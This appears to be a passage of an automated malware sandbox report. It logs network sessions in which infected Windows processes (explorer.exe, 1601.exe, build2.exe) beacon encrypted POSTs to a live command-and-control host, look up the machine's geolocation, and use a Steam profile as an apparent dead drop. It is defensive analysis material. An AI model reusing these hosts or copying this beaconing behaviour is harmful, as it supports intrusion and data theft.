Apr 4, 2024 17:49:20.283193111 CEST	362	OUT	Data Raw: 12 87 87 93 60 f8 a1 b4 ca 36 76 30 7d bd 91 8e 46 62 ae 33 a3 44 63 ef b9 9c dd 86 8e d0 9b f1 1c b0 5c a7 6a 1e cc 96 99 af f3 db c7 9c 11 66 68 f6 39 bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 84 66 5d 02 c8 a1 c1 64 56 cc a8 3b Data Ascii: `6v0}Fb3Dc\jfh9\Fu$f]dV;=pbnQAA W@qKlf2EGJeJ>I;#f^i8'6@UY:4_\|\0^_,)B}bxZWU/ #WBEz,>1z3es>
Apr 4, 2024 17:49:20.580837965 CEST	156	IN	HTTP/1.1 200 OK Server: nginx/1.20.2 Date: Thu, 04 Apr 2024 15:49:20 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.10	49766	193.106.175.76	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Apr 4, 2024 17:49:20.881308079 CEST	282	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://yxnwgxcirurq.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 143 Host: trad-einmyus.com
Apr 4, 2024 17:49:20.881350994 CEST	143	OUT	Data Raw: 12 87 87 93 60 f8 a1 b4 ca 36 76 30 7d bd 91 8e 46 62 ae 33 a3 44 63 ef b9 9c dd 86 8e d0 9b f1 1c b0 5c a7 6a 1e cc 96 99 af f3 db c7 9c 11 66 68 f6 39 bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 85 66 5d 02 c8 a1 c1 64 50 bc 9b 7a Data Ascii: `6v0}Fb3Dc\jfh9\Fu$f]dPzNF+iu^DBuSn{}l_ -}0(.'C4#_H
Apr 4, 2024 17:49:21.179472923 CEST	156	IN	HTTP/1.1 200 OK Server: nginx/1.20.2 Date: Thu, 04 Apr 2024 15:49:21 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.10	49768	193.106.175.76	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Apr 4, 2024 17:49:21.462222099 CEST	283	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://mphdyxrkiaplq.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 164 Host: trad-einmyus.com
Apr 4, 2024 17:49:21.462244034 CEST	164	OUT	Data Raw: 12 87 87 93 60 f8 a1 b4 ca 36 76 30 7d bd 91 8e 46 62 ae 33 a3 44 63 ef b9 9c dd 86 8e d0 9b f1 1c b0 5c a7 6a 1e cc 96 99 af f3 db c7 9c 11 66 68 f6 39 bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 82 66 5d 02 c8 a1 c1 64 44 87 a7 74 Data Ascii: `6v0}Fb3Dc\jfh9\Fu$f]dDt<v$a9DK2N+h{p4i\|ed>/n6uv[cIXTaB]w'=<
Apr 4, 2024 17:49:21.755738020 CEST	156	IN	HTTP/1.1 200 OK Server: nginx/1.20.2 Date: Thu, 04 Apr 2024 15:49:21 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.10	49770	193.106.175.76	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Apr 4, 2024 17:49:22.058744907 CEST	285	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://oenbmxunqihumux.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 333 Host: trad-einmyus.com
Apr 4, 2024 17:49:22.058767080 CEST	333	OUT	Data Raw: 12 87 87 93 60 f8 a1 b4 ca 36 76 30 7d bd 91 8e 46 62 ae 33 a3 44 63 ef b9 9c dd 86 8e d0 9b f1 1c b0 5c a7 6a 1e cc 96 99 af f3 db c7 9c 11 66 68 f6 39 bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 83 66 5d 02 c8 a1 c1 64 1b a8 c0 29 Data Ascii: `6v0}Fb3Dc\jfh9\Fu$f]d)w1d(B,BkCcb2J@.'2c>eR)Z{,u+`S_BOcuV1~ 0H8 SxZWR,!^`+M*eMdc>LtY~JD
Apr 4, 2024 17:49:22.357259989 CEST	156	IN	HTTP/1.1 200 OK Server: nginx/1.20.2 Date: Thu, 04 Apr 2024 15:49:22 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.10	49772	193.106.175.76	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Apr 4, 2024 17:49:22.644556046 CEST	282	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://lwhqeahmjeyw.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 162 Host: trad-einmyus.com
Apr 4, 2024 17:49:22.644567013 CEST	162	OUT	Data Raw: 12 87 87 93 60 f8 a1 b4 ca 36 76 30 7d bd 91 8e 46 62 ae 33 a3 44 63 ef b9 9c dd 86 8e d0 9b f1 1c b0 5c a7 6a 1e cc 96 99 af f3 db c7 9c 11 66 68 f6 39 bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 80 66 5d 02 c8 a1 c1 64 47 dc d3 2c Data Ascii: `6v0}Fb3Dc\jfh9\Fu$f]dG,BjUK0U?(@^g-[z4^IG>&/UL]V\?8S8j{G0
Apr 4, 2024 17:49:22.938536882 CEST	380	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.2 Date: Thu, 04 Apr 2024 15:49:22 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 63 35 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 84 42 09 25 16 f9 b5 8f bd b8 15 a5 0c ce 2c b4 59 52 db 04 e5 fd 28 e3 22 58 1b b2 ed cf 00 bc 51 de 4b d1 fb 25 83 2a e8 ae 95 58 2d e4 be 41 2d fa a5 b4 6a f3 91 be 5a a8 74 9e c9 37 40 5a 3c 0d 4f df a6 3d fd dd 47 87 ad d3 1a d1 3b 93 84 69 77 3c f0 29 76 94 c8 9e 94 25 ff 60 18 88 4a ef 0a ea e3 d2 63 d1 82 f6 31 db 7f f3 ae 9a e0 5c 8c c0 97 18 1f c4 5f fe bc bf c1 fa ad 12 15 a9 2e 8b de 22 82 7f 65 46 b7 8d ab e6 a9 41 b9 1d 34 99 97 be ea 8b e6 78 82 74 34 36 6a 3a eb 87 09 c7 29 aa af ae 2e c0 d5 85 04 4e 30 63 cc 0d 0a 30 0d 0a 0d 0a Data Ascii: c5I:82OB%,YR("XQK%*X-A-jZt7@Z<O=G;iw<)v%`Jc1\_."eFA4xt46j:).N0c0

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.10	49722	104.21.65.24	443	5136	C:\Users\user\AppData\Local\Temp\1601.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-04 15:48:59 UTC	85	OUT	GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua
2024-04-04 15:48:59 UTC	910	IN	HTTP/1.1 429 Too Many Requests Date: Thu, 04 Apr 2024 15:48:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close strict-transport-security: max-age=63072000; preload x-frame-options: SAMEORIGIN x-content-type-options: nosniff x-xss-protection: 1; mode=block; report=... access-control-allow-origin: * access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T7BeVb3jkMDPR10cf3zCVQ6Cyj8hFiXcrwfXcRWONhxyEHprx3dSoq0%2F2epYl96lxo7uThM2jf5BKIFHTmNGiYMZeBSYJv59aqXhfc5P7uGdifzPxgQgrZ%2B9LTuf"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86f2722038c931e4-MIA alt-svc: h3=":443"; ma=86400
2024-04-04 15:48:59 UTC	459	IN	Data Raw: 33 32 66 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 6c 2f 65 6d 61 69 6c 2d 70 72 6f 74 65 63 74 69 6f 6e 23 64 62 62 33 62 65 62 37 61 62 39 62 65 39 62 32 61 62 66 35 62 36 62 65 65 34 61 38 61 65 62 39 62 31 62 65 62 38 Data Ascii: 32f<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="/cdn-cgi/l/email-protection#dbb3beb7ab9be9b2abf5b6bee4a8aeb9b1beb8
2024-04-04 15:48:59 UTC	363	IN	Data Raw: d0 b0 d0 b7 d0 b5 20 d0 b4 d0 b0 d0 bd d0 bd d1 8b d1 85 2e 20 d0 94 d0 bb d1 8f 20 d0 bf d0 be d0 bb d1 83 d1 87 d0 b5 d0 bd d0 b8 d1 8f 20 d0 b4 d0 be d0 bf d0 be d0 bb d0 bd d0 b8 d1 82 d0 b5 d0 bb d1 8c d0 bd d0 be d0 b9 20 d0 b8 d0 bd d1 84 d0 be d1 80 d0 bc d0 b0 d1 86 d0 b8 d0 b8 2c 20 d0 bf d0 be d0 b6 d0 b0 d0 bb d1 83 d0 b9 d1 81 d1 82 d0 b0 2c 20 d0 be d0 b1 d1 80 d0 b0 d1 89 d0 b0 d0 b9 d1 82 d0 b5 63 d1 8c 20 d0 bf d0 be 20 d0 b0 d0 b4 d1 80 d0 b5 d1 81 d1 83 20 3c 61 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 6c 2f 65 6d 61 69 6c 2d 70 72 6f 74 65 63 74 69 6f 6e 23 64 37 62 66 62 32 62 62 61 37 39 37 65 35 62 65 61 37 66 39 61 32 62 36 65 38 61 34 61 32 62 35 62 64 62 32 62 34 61 33 65 61 65 35 62 65 61 37 66 39 61 32 62 36 22 3e 3c 73 Data Ascii: . , , c <a href="/cdn-cgi/l/email-protection#d7bfb2bba797e5bea7f9a2b6e8a4a2b5bdb2b4a3eae5bea7f9a2b6"><s
2024-04-04 15:48:59 UTC	114	IN	Data Raw: 36 63 0d 0a 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 73 72 63 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 63 72 69 70 74 73 2f 35 63 35 64 64 37 32 38 2f 63 6c 6f 75 64 66 6c 61 72 65 2d 73 74 61 74 69 63 2f 65 6d 61 69 6c 2d 64 65 63 6f 64 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a Data Ascii: 6c<script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script>
2024-04-04 15:48:59 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.10	49728	104.21.65.24	443	3944	C:\Users\user\AppData\Local\Temp\1601.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-04 15:49:03 UTC	85	OUT	GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua
2024-04-04 15:49:03 UTC	914	IN	HTTP/1.1 429 Too Many Requests Date: Thu, 04 Apr 2024 15:49:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close strict-transport-security: max-age=63072000; preload x-frame-options: SAMEORIGIN x-content-type-options: nosniff x-xss-protection: 1; mode=block; report=... access-control-allow-origin: * access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Uk5k5IaVQvxYIY6jefJL%2BheizNj9R9iZk4seyKgEQ0BrfB4TM5%2Fasoy2LHm8%2FgToADNqAnNGnp6rYlayKzKgQbg3SJyrIMWQaxgWL14ZgdS3Ss%2ByARlrH9SZEne9"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86f272374ead8d9d-MIA alt-svc: h3=":443"; ma=86400
2024-04-04 15:49:03 UTC	455	IN	Data Raw: 33 32 66 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 6c 2f 65 6d 61 69 6c 2d 70 72 6f 74 65 63 74 69 6f 6e 23 64 39 62 31 62 63 62 35 61 39 39 39 65 62 62 30 61 39 66 37 62 34 62 63 65 36 61 61 61 63 62 62 62 33 62 63 62 61 Data Ascii: 32f<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="/cdn-cgi/l/email-protection#d9b1bcb5a999ebb0a9f7b4bce6aaacbbb3bcba
2024-04-04 15:49:03 UTC	367	IN	Data Raw: ba 20 d0 b1 d0 b0 d0 b7 d0 b5 20 d0 b4 d0 b0 d0 bd d0 bd d1 8b d1 85 2e 20 d0 94 d0 bb d1 8f 20 d0 bf d0 be d0 bb d1 83 d1 87 d0 b5 d0 bd d0 b8 d1 8f 20 d0 b4 d0 be d0 bf d0 be d0 bb d0 bd d0 b8 d1 82 d0 b5 d0 bb d1 8c d0 bd d0 be d0 b9 20 d0 b8 d0 bd d1 84 d0 be d1 80 d0 bc d0 b0 d1 86 d0 b8 d0 b8 2c 20 d0 bf d0 be d0 b6 d0 b0 d0 bb d1 83 d0 b9 d1 81 d1 82 d0 b0 2c 20 d0 be d0 b1 d1 80 d0 b0 d1 89 d0 b0 d0 b9 d1 82 d0 b5 63 d1 8c 20 d0 bf d0 be 20 d0 b0 d0 b4 d1 80 d0 b5 d1 81 d1 83 20 3c 61 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 6c 2f 65 6d 61 69 6c 2d 70 72 6f 74 65 63 74 69 6f 6e 23 30 33 36 62 36 36 36 66 37 33 34 33 33 31 36 61 37 33 32 64 37 36 36 32 33 63 37 30 37 36 36 31 36 39 36 36 36 30 37 37 33 65 33 31 36 61 37 33 32 64 37 36 36 32 Data Ascii: . , , c <a href="/cdn-cgi/l/email-protection#036b666f7343316a732d76623c707661696660773e316a732d7662
2024-04-04 15:49:03 UTC	114	IN	Data Raw: 36 63 0d 0a 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 73 72 63 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 63 72 69 70 74 73 2f 35 63 35 64 64 37 32 38 2f 63 6c 6f 75 64 66 6c 61 72 65 2d 73 74 61 74 69 63 2f 65 6d 61 69 6c 2d 64 65 63 6f 64 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a Data Ascii: 6c<script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script>
2024-04-04 15:49:03 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.10	49729	104.21.65.24	443	7496	C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-04 15:49:03 UTC	85	OUT	GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua
2024-04-04 15:49:04 UTC	914	IN	HTTP/1.1 429 Too Many Requests Date: Thu, 04 Apr 2024 15:49:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close strict-transport-security: max-age=63072000; preload x-frame-options: SAMEORIGIN x-content-type-options: nosniff x-xss-protection: 1; mode=block; report=... access-control-allow-origin: * access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2H786yY2Zg6i6u2LtkPhFEHTZGvJ516yInF4tETdp0cQaE52bNtbJFpTHQdIc3otEeIiJijS1I5hh%2B9E8fHkhsIcn6ay8g69wCW9Hl4T7%2FZ0cf%2B4TeNwD%2BQxibiA"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86f2723c0e362230-MIA alt-svc: h3=":443"; ma=86400
2024-04-04 15:49:04 UTC	455	IN	Data Raw: 33 39 62 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 6c 2f 65 6d 61 69 6c 2d 70 72 6f 74 65 63 74 69 6f 6e 23 64 30 62 38 62 35 62 63 61 30 39 30 65 32 62 39 61 30 66 65 62 64 62 35 65 66 61 33 61 35 62 32 62 61 62 35 62 33 Data Ascii: 39b<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="/cdn-cgi/l/email-protection#d0b8b5bca090e2b9a0febdb5efa3a5b2bab5b3
2024-04-04 15:49:04 UTC	475	IN	Data Raw: ba 20 d0 b1 d0 b0 d0 b7 d0 b5 20 d0 b4 d0 b0 d0 bd d0 bd d1 8b d1 85 2e 20 d0 94 d0 bb d1 8f 20 d0 bf d0 be d0 bb d1 83 d1 87 d0 b5 d0 bd d0 b8 d1 8f 20 d0 b4 d0 be d0 bf d0 be d0 bb d0 bd d0 b8 d1 82 d0 b5 d0 bb d1 8c d0 bd d0 be d0 b9 20 d0 b8 d0 bd d1 84 d0 be d1 80 d0 bc d0 b0 d1 86 d0 b8 d0 b8 2c 20 d0 bf d0 be d0 b6 d0 b0 d0 bb d1 83 d0 b9 d1 81 d1 82 d0 b0 2c 20 d0 be d0 b1 d1 80 d0 b0 d1 89 d0 b0 d0 b9 d1 82 d0 b5 63 d1 8c 20 d0 bf d0 be 20 d0 b0 d0 b4 d1 80 d0 b5 d1 81 d1 83 20 3c 61 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 6c 2f 65 6d 61 69 6c 2d 70 72 6f 74 65 63 74 69 6f 6e 23 39 31 66 39 66 34 66 64 65 31 64 31 61 33 66 38 65 31 62 66 65 34 66 30 61 65 65 32 65 34 66 33 66 62 66 34 66 32 65 35 61 63 61 33 66 38 65 31 62 66 65 34 66 30 Data Ascii: . , , c <a href="/cdn-cgi/l/email-protection#91f9f4fde1d1a3f8e1bfe4f0aee2e4f3fbf4f2e5aca3f8e1bfe4f0
2024-04-04 15:49:04 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.10	49735	23.47.27.74	443	7712	C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-04 15:49:07 UTC	119	OUT	GET /profiles/76561199662282318 HTTP/1.1 Host: steamcommunity.com Connection: Keep-Alive Cache-Control: no-cache
2024-04-04 15:49:07 UTC	1870	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Thu, 04 Apr 2024 15:49:07 GMT Content-Length: 33790 Connection: close Set-Cookie: sessionid=e90eab4b89c86b3d860572c1; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7Cbd44e98e0d3d15c935a3d2dda85040fb; Path=/; Secure; HttpOnly; SameSite=None
2024-04-04 15:49:07 UTC	14514	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-04-04 15:49:07 UTC	10062	IN	Data Raw: 6f 62 61 6c 5f 61 63 74 69 6f 6e 5f 6c 69 6e 6b 22 20 69 64 3d 22 6c 61 6e 67 75 61 67 65 5f 70 75 6c 6c 64 6f 77 6e 22 20 6f 6e 63 6c 69 63 6b 3d 22 53 68 6f 77 4d 65 6e 75 28 20 74 68 69 73 2c 20 27 6c 61 6e 67 75 61 67 65 5f 64 72 6f 70 64 6f 77 6e 27 2c 20 27 72 69 67 68 74 27 20 29 3b 22 3e 6c 61 6e 67 75 61 67 65 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 5f 62 6c 6f 63 6b 5f 6e 65 77 22 20 69 64 3d 22 6c 61 6e 67 75 61 67 65 5f 64 72 6f 70 64 6f 77 6e 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 22 3e 0d 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 5f 62 6f 64 79 20 70 6f 70 75 70 5f 6d 65 6e 75 22 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 Data Ascii: obal_action_link" id="language_pulldown" onclick="ShowMenu( this, 'language_dropdown', 'right' );">language</span><div class="popup_block_new" id="language_dropdown" style="display: none;"><div class="popup_body popup_menu">
2024-04-04 15:49:07 UTC	9214	IN	Data Raw: 74 65 61 6d 67 61 6d 65 73 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 53 54 41 54 53 5f 42 41 53 45 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 70 61 72 74 6e 65 72 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 49 4e 54 45 52 4e 41 4c 5f 53 54 41 54 53 5f 42 41 53 45 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 65 61 6d 73 74 61 74 73 2e 76 61 6c 76 65 2e 6f 72 67 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 49 4e 5f 43 4c 49 45 4e 54 26 71 75 6f 74 3b 3a 66 61 6c 73 65 2c 26 71 75 6f 74 3b 55 53 45 5f 50 4f 50 55 50 53 26 71 75 6f 74 3b 3a 66 61 6c 73 65 2c 26 71 75 6f 74 3b 53 54 4f 52 45 5f 49 43 4f 4e 5f 42 41 Data Ascii: teamgames.com\/","STATS_BASE_URL":"https:\/\/partner.steampowered.com\/","INTERNAL_STATS_BASE_URL":"https:\/\/steamstats.valve.org\/","IN_CLIENT":false,"USE_POPUPS":false,"STORE_ICON_BA

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.10	49736	95.216.179.73	443	7712	C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-04 15:49:09 UTC	233	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0 Host: 95.216.179.73 Connection: Keep-Alive Cache-Control: no-cache
2024-04-04 15:49:10 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 04 Apr 2024 15:49:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-04 15:49:10 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
